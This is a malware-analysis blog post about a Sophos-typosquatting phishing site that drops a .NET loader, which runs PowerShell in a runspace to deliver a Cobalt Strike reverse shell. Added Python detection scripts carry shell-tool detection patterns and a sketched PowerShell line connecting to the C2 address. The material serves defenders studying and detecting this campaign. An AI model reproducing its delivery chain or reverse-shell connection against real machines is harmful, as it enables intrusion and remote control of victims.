Cobalt Strike Beacon Via Sophos Phishing Website – Cyble

Key Takeaways

  • Cyble Research & Intelligence Labs (CRIL) encountered a typosquatted domain of Sophos.
  • The phishing site contains a malware payload embedded within its source code.
  • When a user visits this site, the malware is automatically downloaded to the victim’s machine without requiring any user interaction.
  • The phishing website distributes a malicious .NET loader containing an embedded PowerShell script.
  • To execute this PowerShell script, a runspace is utilized, preventing the creation of new PowerShell processes and facilitating the dynamic execution of subsequent PowerShell scripts.
  • This script delivers a Cobalt Strike beacon, establishing a reverse TCP shell with an IP address encoded in hexadecimal format.

Cyble Research & Intelligence Labs (CRIL) came across a typosquatted domain of Sophos, “sopbos[.]com”, using a VirusTotal search. The phishing site impersonates a Sophos Home installation page.

The initial infection vector is unclear at this time as we could not trace how users would be directed to this phishing site. Based on the phishing site, we suspect users might have reached it via a phishing email or ads containing a link asking them to install Sophos Home. Upon clicking on the link, this site initiates automatic payload downloads without requiring any user interaction.

The figure below shows the malicious site impersonating Sophos.

Figure 1 – Sophos Phishing Site

The downloaded file is a malicious .Net loader that contains an embedded PowerShell script. Notably, this PowerShell script is executed within a runspace, preventing the creation of new PowerShell processes and enabling on-the-fly execution of subsequent scripts. Ultimately, a Cobalt Strike beacon is deployed that establishes a reverse TCP shell.

Technical Analysis

The phishing site consists mainly of JavaScript code. Upon visiting the site, the JavaScript code is triggered, initiating the download of a malicious file onto the victim’s device. Once the site is loaded, the HTML code displays an image disguised as the Sophos web page to any visitor.

The figure below shows the code of the phishing site.

Figure 2 – Source Code of Phishing Sites

The JavaScript code executes automatically once users visit the phishing site. It begins by decoding a Base64-encoded executable and saving it in a blob. It then takes a conditional approach based on the user’s web browser to download an executable file named “SophosInstall..exe”.

For Internet Explorer users, the blob is directly saved or opened using the window.navigator.msSaveOrOpenBlob method. In contrast, for users on other modern browsers, the code dynamically generates an anchor element, links it to the blob’s URL, and simulates a click event using the click() method on the anchor to initiate the download. Using this method, the download process is initiated automatically as soon as the JavaScript code is executed, without requiring any user interaction.
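The drive-by pattern described above (a Base64 literal that decodes to a PE, combined with a scripted blob download via msSaveOrOpenBlob or a synthetic anchor click) can be triaged offline from a saved copy of the page. The following is an added example, not code from the original post or from Cyble: a small Python checker that decodes every long Base64 literal in an HTML page, looks for the MZ signature, and checks for the download-trigger APIs the post names. The sample page and its fake "executable" (an MZ header followed by padding) are constructed for this example, and the API list is a heuristic chosen here, not a rule from the post.

```python
import base64
import re

# Constructed fixture in the shape described above: a decoy image plus a script
# that carries a Base64 blob and triggers the save. The "executable" is just an
# MZ header followed by padding, so nothing here is a real binary.
FAKE_PE = b"MZ" + b"\x90" * 62
SAMPLE_HTML = """<html><body><img src="sophos.png">
<script>
var payload = "__B64__"; // Base64 of the dropped file (sketch, not a working page)
if (window.navigator.msSaveOrOpenBlob) { window.navigator.msSaveOrOpenBlob(blob, "Installer.exe"); }
else { var a = document.createElement("a"); a.href = URL.createObjectURL(blob); a.click(); }
</script></body></html>""".replace("__B64__", base64.b64encode(FAKE_PE).decode())

# A page that offers a normal link-based download should not be flagged.
BENIGN_HTML = '<html><body><a href="/downloads/setup.exe">Download the installer</a></body></html>'

# Any quoted run of 40+ Base64 characters is worth decoding.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{40,}={0,2})["\']')

# APIs the post describes for pushing the blob to disk without a user click.
AUTO_DOWNLOAD_APIS = [
    "msSaveOrOpenBlob",
    "createObjectURL",
    'createElement("a")',
    "createElement('a')",
    ".click()",
]


def embedded_executables(html):
    """Return the decoded Base64 literals that start with the PE 'MZ' signature."""
    found = []
    for literal in B64_LITERAL.findall(html):
        try:
            data = base64.b64decode(literal, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        if data[:2] == b"MZ":
            found.append(data)
    return found


def triage_page(html):
    """Flag a page that both embeds a PE and scripts its download.

    Returns (flagged, reasons) so the reasons can go into an analyst note.
    """
    reasons = []
    pes = embedded_executables(html)
    if pes:
        reasons.append(f"{len(pes)} Base64 literal(s) decode to a PE (MZ) header")
    apis = [api for api in AUTO_DOWNLOAD_APIS if api in html]
    if apis:
        reasons.append("download-trigger APIs present: " + ", ".join(apis))
    # Require both signals: a blob download alone is common on legitimate sites.
    return (bool(pes) and bool(apis)), reasons


if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        flagged, reasons = triage_page(page)
        print(name, "FLAGGED" if flagged else "clean", reasons)
```

Requiring both signals keeps the check useful: plenty of legitimate sites create object URLs and click anchors, but very few embed a complete PE inside the page itself.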

The figure below shows the code for downloading the file.

Figure 3 – Downloads Malicious Executable

Payload

The downloaded file is a 64-bit .Net binary that, upon execution, uses a runspace to execute the embedded PowerShell code. The malware creates the runspace using the RunspaceFactory.CreateRunspace() method, as shown in Figure 4. This method allows the execution of the PowerShell script without saving it to disk or creating a new process. Consequently, it minimizes the occurrence of PowerShell events, reducing the likelihood of detection by security solutions.

Figure 4 – Creating PowerShell Runspace

This executable can also run with specific command line parameters. It examines whether any of the provided optional arguments have been supplied and adjusts the binary’s behavior accordingly.

| Command Line Argument | Description | Case Sensitive |
|---|---|---|
| -wait | Prints “Hit any key to exit…” | Yes |
| -extract | Writes the decoded PowerShell to a file | No |
| -end | Stores the position at which this argument is passed | Yes |
| -debug | Launches the debugger using System.Diagnostics.Debugger.Launch() | Yes |

Following this, the executable decodes the Base64-encoded PowerShell script present within it and loads it into the PowerShell runspace session using the AddScript() method. Subsequently, it initiates the script’s execution using the BeginInvoke() method.
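Hosting the PowerShell engine in a runspace avoids a powershell.exe process, but it does not avoid loading the engine assembly: the loader still has to map System.Management.Automation.dll into its own process. That image load is a solid hunting signal. The following is an added example, not code from the original post or from Cyble: a Python script that reads Sysmon Event ID 7 (ImageLoad) records as JSON lines and reports any process other than a known PowerShell host that loads the engine. The event records are constructed for this example (the loader file name is the one from the post; the paths and PIDs are made up), and the list of known hosts is an assumption to tune for your environment.

```python
import json

# Processes that legitimately host the PowerShell engine (assumed list; tune it).
# Any other image that loads System.Management.Automation is running PowerShell
# inside its own runspace, which is exactly what the loader above does.
KNOWN_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
ENGINE_DLLS = {
    "system.management.automation.dll",
    "system.management.automation.ni.dll",  # native-image variant
}

# Constructed Sysmon Event ID 7 (ImageLoad) records as JSON lines. The loader
# file name comes from the post; paths and PIDs are made up for this sample.
SAMPLE_EVENTS = r"""
{"EventID": 7, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ImageLoaded": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\System.Management.Automation.dll"}
{"EventID": 7, "ProcessId": 5532, "Image": "C:\\Users\\victim\\Downloads\\SophosInstall..exe", "ImageLoaded": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\System.Management.Automation.dll"}
{"EventID": 7, "ProcessId": 6100, "Image": "C:\\Windows\\System32\\notepad.exe", "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll"}
{"EventID": 1, "ProcessId": 5532, "Image": "C:\\Users\\victim\\Downloads\\SophosInstall..exe", "CommandLine": "SophosInstall..exe -wait"}
"""


def parse_events(text):
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def file_name(path):
    """Return the lower-case file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_runspace_hosts(events):
    """Return (ProcessId, Image, ImageLoaded) for engine loads by unexpected hosts."""
    hits = []
    for event in events:
        if event.get("EventID") != 7:
            continue  # only image-load events carry the DLL name
        if file_name(event.get("ImageLoaded", "")) not in ENGINE_DLLS:
            continue
        if file_name(event.get("Image", "")) in KNOWN_HOSTS:
            continue  # a real PowerShell host loading its own engine is normal
        hits.append((event.get("ProcessId"), event["Image"], event["ImageLoaded"]))
    return hits


if __name__ == "__main__":
    for pid, image, loaded in find_runspace_hosts(parse_events(SAMPLE_EVENTS)):
        print(f"pid {pid}: {image} loaded {loaded}")
```

The same idea works with whatever EDR exposes module loads. Note also that script block logging (Event ID 4104) is implemented inside the engine, so code run through a runspace is still logged when that policy is enabled, even though no powershell.exe process appears in the process tree.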

The figure below illustrates the encoded PowerShell script.

Figure 5 – Encoded PowerShell Script

Now, the PowerShell script is executed, which decodes an additional Base64-encoded string and then performs AES decryption on the decoded data, followed by decompression. The resulting data is converted to a UTF-8 encoded string. Finally, it executes another PowerShell script extracted from this processed data using the Invoke-Expression cmdlet. This script, shown in Figure 6, essentially serves as a method to hide and execute PowerShell code for the next stage.

Figure 6 – PowerShell Script

While both scripts follow a similar type of decryption, decompression, and script execution, they employ different decryption keys, initialization vectors (IVs), and compression algorithms. The first script uses the Deflate algorithm, while the second script utilizes the Gzip stream for decompression.
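When unpacking stages like these by hand, the compression container is the detail that most often trips up an analyst: .NET's DeflateStream writes raw Deflate with no header, while GZipStream writes a Gzip container with the 1f 8b magic, and feeding one to the other's decompressor fails. The following is an added example, not code from the original post or from Cyble: a Python helper that sniffs the container and decompresses accordingly. It assumes the AES step has already been done (that needs the sample's key and IV, which the post does not publish, and a crypto library), so its input is the decrypted, compressed bytes, Base64-encoded. The stage text and both fixtures are constructed here.

```python
import base64
import gzip
import zlib


def inflate_stage(blob):
    """Decompress one decrypted stage, sniffing which container the .NET side used.

    Returns (plaintext_bytes, container_name) where container_name is one of
    "gzip" (GZipStream), "deflate" (DeflateStream, raw RFC 1951) or "zlib".
    """
    if blob[:2] == b"\x1f\x8b":  # Gzip magic (RFC 1952)
        return zlib.decompress(blob, wbits=16 + zlib.MAX_WBITS), "gzip"
    try:
        # Negative wbits tells zlib to expect a raw Deflate stream with no header.
        return zlib.decompress(blob, wbits=-zlib.MAX_WBITS), "deflate"
    except zlib.error:
        # Fall back to a zlib-wrapped stream (2-byte header, Adler-32 trailer).
        return zlib.decompress(blob), "zlib"


def decode_stage(b64_text):
    """Base64-decode, decompress and UTF-8-decode a stage.

    The AES decryption that sits between Base64 and decompression in the real
    chain is assumed to have been applied already. Returns (script_text, container).
    """
    data, container = inflate_stage(base64.b64decode(b64_text))
    return data.decode("utf-8"), container


# Constructed fixtures standing in for the two stages described above.
NEXT_STAGE = "Write-Output 'constructed stage text, not the recovered script'"


def _raw_deflate(data):
    """Produce raw Deflate bytes, the way .NET's DeflateStream does."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return comp.compress(data) + comp.flush()


SAMPLE_DEFLATE_B64 = base64.b64encode(_raw_deflate(NEXT_STAGE.encode())).decode()
SAMPLE_GZIP_B64 = base64.b64encode(gzip.compress(NEXT_STAGE.encode())).decode()

if __name__ == "__main__":
    for sample in (SAMPLE_DEFLATE_B64, SAMPLE_GZIP_B64):
        text, container = decode_stage(sample)
        print(f"[{container}] {text}")
```

Sniffing the container rather than hard-coding it means the same helper recovers both the first-stage (Deflate) and second-stage (Gzip) scripts without editing it between runs.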

The figure below shows the comparison between scripts.

Figure 7 – Comparison between Scripts

The second PowerShell script decrypts and executes the final PowerShell script. The final PowerShell script is a Cobalt Strike beacon. It sets up a reverse shell, where a remote attacker can send commands to the machine, execute them, and receive responses from the compromised machine.

The final PowerShell script begins with the command “Start-Process $PSHOME powershell.exe” to launch a PowerShell instance, causing it to execute through this process instead of within a runspace, as illustrated in the figure below.

Figure 8 – Process Tree

The final PowerShell script establishes a network connection to a remote server represented by the IP address and port provided in hexadecimal format, as mentioned below.

  • 0x6247e8df: 98[.]71.232[.]223
  • 0x1f90: 8080

The script then creates a data stream and reads incoming data in chunks. It converts this received data from bytes to text, executes it using iex (Invoke-Expression), captures the output, appends a custom string, and sends it back to the remote server. This process continues in a loop until no more data is received, after which the network connection is closed.
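The hex-encoded endpoint and the read/iex/write loop are both visible in script block logs, so they make good triage inputs. The following is an added example, not code from the original post or from Cyble: a Python script that takes the text of a PowerShell script block (a constructed sketch here, carrying the two hex constants from the post, not the recovered beacon script), decodes every hex literal as a candidate IPv4 address or port, and flags the block when socket APIs and Invoke-Expression appear together. The indicator list is a heuristic chosen for this example. It decodes the address in both byte orders, because the post reads 0x6247e8df big-endian while some .NET APIs interpret an integer address in host (little-endian) order.

```python
import re
import socket
import struct

# Constructed script block in the shape described above. The hex constants are
# the ones reported in the post; the surrounding lines are an illustrative
# sketch for the detector, not the recovered script.
SAMPLE_SCRIPT_BLOCK = """
$client = New-Object System.Net.Sockets.TCPClient
$client.Connect(0x6247e8df, 0x1f90)
$stream = $client.GetStream()
# ... read chunks, run them with iex, append the marker string, write back ...
"""

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{1,8})\b")

# Tokens that together indicate an interactive shell over a raw socket (heuristic).
SHELL_INDICATORS = ["TCPClient", "GetStream", "iex", "Invoke-Expression"]


def hex_to_ipv4(value, little_endian=False):
    """Render a 32-bit integer as dotted IPv4 in the chosen byte order."""
    packed = struct.pack("<I" if little_endian else ">I", value)
    return socket.inet_ntoa(packed)


def decode_endpoints(script):
    """Decode hex literals into candidate addresses and ports.

    Values wider than 16 bits are treated as addresses and rendered in both
    byte orders as (big_endian, little_endian); 1..65535 are treated as ports.
    """
    ips, ports = [], []
    for digits in HEX_LITERAL.findall(script):
        value = int(digits, 16)
        if value > 0xFFFF:
            ips.append((hex_to_ipv4(value), hex_to_ipv4(value, little_endian=True)))
        elif value > 0:
            ports.append(value)
    return {"ips": ips, "ports": ports}


def triage_script_block(script):
    """Return (flagged, indicators_found, endpoints) for one script block."""
    indicators = [
        token for token in SHELL_INDICATORS
        if re.search(r"\b" + re.escape(token) + r"\b", script, re.IGNORECASE)
    ]
    endpoints = decode_endpoints(script)
    # Socket use plus code execution plus a numeric endpoint is the combination
    # that separates a reverse shell from ordinary scripts that open a socket.
    flagged = len(indicators) >= 2 and bool(endpoints["ips"])
    return flagged, indicators, endpoints


if __name__ == "__main__":
    flagged, indicators, endpoints = triage_script_block(SAMPLE_SCRIPT_BLOCK)
    print("flagged:", flagged)
    print("indicators:", indicators)
    print("endpoints:", endpoints)
```

The big-endian reading reproduces the post's 98[.]71.232[.]223 and 8080; the little-endian column is there so an analyst checking the same constant against network telemetry is not misled if the sample hands it to an API with the opposite convention.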

As the C&C server is down, we were not able to investigate this further.

The figure below shows the Cobalt Strike beacon.

Figure 9 – Cobalt Strike Beacon

Conclusion

In the past, Cobalt Strike has been employed by Threat Actors (TAs) to distribute various malware payloads, including ransomware and Remote Access Trojans (RATs). Unfortunately, due to the C&C (Command and Control) server being inaccessible, we were unable to examine the specific malware payload that the TAs intended to deploy. However, it is worth noting that in this campaign, a .Net loader was utilized to execute PowerShell scripts through runspace. Though this is not a new technique, it enhances the malware’s evasiveness by executing scripts without spawning new processes or saving them to the disk, thereby reducing the possibility of detection.

Our Recommendations

  • Deploy Cobalt Strike-specific signatures and rules for your network monitoring solution.
  • Implement application whitelisting to restrict the execution of PowerShell scripts to only approved and trusted scripts or locations.
  • Block the malicious IOCs shared in the table below.

MITRE ATT&CK® Techniques

| Tactic | Technique ID | Procedure |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566) | This malware reaches users via phishing sites. |
| Execution (TA0002) | User Execution (T1204) | The user needs to manually execute the malicious file downloaded from the phishing site. |
| Execution (TA0002) | Command and Scripting Interpreter (T1059) | PowerShell scripts are used to execute the Cobalt Strike beacon. |
| Defense Evasion (TA0005) | Indirect Command Execution (T1202) | PowerShell commands are executed using a malicious executable. |
| Defense Evasion (TA0005) | Masquerading (T1036) | The downloaded file is disguised as a Sophos installer. |
| Defense Evasion (TA0005) | Deobfuscate/Decode Files or Information (T1140) | PowerShell scripts are deobfuscated and decoded to get the Cobalt Strike beacon. |
| Command and Control (TA0011) | Non-Application Layer Protocol (T1095) | TCP is used by the Cobalt Strike beacon to interact with the C&C server. |

Indicators of Compromise (IOCs)

| Indicators | Indicator Type | Description |
|---|---|---|
| c974ffe23d57ec909ef26b55f202047e | MD5 | SophosInstall..exe |
| ec6da5616d6b3b3269fababe104bfe04f2828717 | SHA1 | SophosInstall..exe |
| 067c95ad074afd8993281b02f74d0f257fb312943da0887355da652afb54c0ab | SHA256 | SophosInstall..exe |
| sopbos[.]com | Domain | Phishing Site |
| 98[.]71.232[.]223 | IP | C&C |

Source: https://cyble.com/blog/covert-delivery-of-cobalt-strike-beacon-via-sophos-phishing-website/